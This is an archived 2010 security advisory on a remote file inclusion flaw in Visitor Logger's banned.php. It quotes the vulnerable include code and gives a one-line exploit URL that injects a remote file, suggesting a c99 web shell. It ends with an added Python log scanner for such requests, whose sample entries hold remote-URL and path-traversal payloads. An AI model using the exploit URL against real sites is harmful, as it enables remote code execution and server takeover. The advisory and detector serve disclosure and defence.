Visitor Logger Remote File Inclusion

2010-06-02T00:00:00
ID PACKETSTORM:90155
Type packetstorm
Reporter bd0rk
Modified 2010-06-02T00:00:00

Description

                                        
                                            `  
  
#-> Visitor Logger (banned.php) Remote File Include Vulnerability  
  
#-> Date: 2010/05/31  
  
#-> Vendor: http://www.graviton-mediatech.com  
  
#-> Download: http://www.graviton-mediatech.com/downloads/Visitor-Logger/Visitor-Logger.zip  
  
#-> Googledork: n/a  
  
#-> Discovered by bd0rk  
  
#-> Contact: bd0rk[at]school-of-hack.net or bd0rk[at]hackermail.com  
  
#-> Website: www.soh-crew.it.tt  
  
#-> Gr33tings: TheJT, Luna-Tic, Frauenarzt, Punkti ;-)  
  
-------------------------------------------------------------------------------  
  
Description 1: Lines three and four of banned.php read as follows:  
  
if (file_exists($VL_include_path."/banned.txt")) {  
include($VL_include_path."/banned.txt");  
  
-------------------------------------------------------------------------------  
  
[+]Exploit: http://[target].com/[logger_path]/banned.php?VL_include_path=[SHELLCODE]  
  
  
--> An attacker can use c99-shellcode, for example.  
  
  
  
  
#### The 21-year-old German hacker bd0rk ####  
  
  
`
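
A log check for the request pattern shown in the advisory, as an added example that is not part of the original advisory or the vendor's code: it scans web-server access-log lines for requests to banned.php that carry a VL_include_path query parameter and grades the supplied value. The combined log format, the /logger/ path, the verdict names and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request part of an Apache/nginx "combined" access-log entry (assumed format).
REQ = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# URL scheme at the start of the value, e.g. http:// or ftp://.
SCHEME = re.compile(r'^[a-z][a-z0-9+.\-]+:', re.I)

def classify(value):
    """Grade a VL_include_path value that arrived in the query string."""
    for _ in range(3):                      # peel nested percent-encoding
        value = unquote(value)
    if SCHEME.match(value) or value.startswith('//'):
        return 'remote-url'
    if '..' in value or '\x00' in value:
        return 'traversal'
    return 'param-override'                 # still abnormal: no client should set it

def scan(lines):
    """Return (client_ip, status, verdict, value) for each request that sets the parameter."""
    hits = []
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue
        parts = urlsplit(m['url'])
        if not parts.path.lower().endswith('/banned.php'):
            continue
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key == 'VL_include_path':    # PHP variable names are case-sensitive
                hits.append((m['ip'], int(m['status']), classify(value), value))
    return hits

# Constructed sample entries (documentation IPs and example.invalid), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Jun/2010:10:00:01 +0000] "GET /logger/index.php HTTP/1.1" 200 2048 "-" "-"',
    '192.0.2.10 - - [02/Jun/2010:10:00:05 +0000] "GET /logger/banned.php HTTP/1.1" 200 120 "-" "-"',
    '198.51.100.7 - - [02/Jun/2010:10:15:32 +0000] "GET /logger/banned.php?VL_include_path=http://example.invalid/x HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [02/Jun/2010:10:15:40 +0000] "GET /logger/banned.php?VL_include_path=ftp%3A%2F%2Fexample.invalid%2Fpub HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.9 - - [02/Jun/2010:11:02:11 +0000] "GET /logger/banned.php?VL_include_path=..%252F..%252Fuploads HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Any hit is worth reviewing, because the include path is meant to be set by the application itself and not by the client; the status code in each tuple helps separate probes from requests the server actually served.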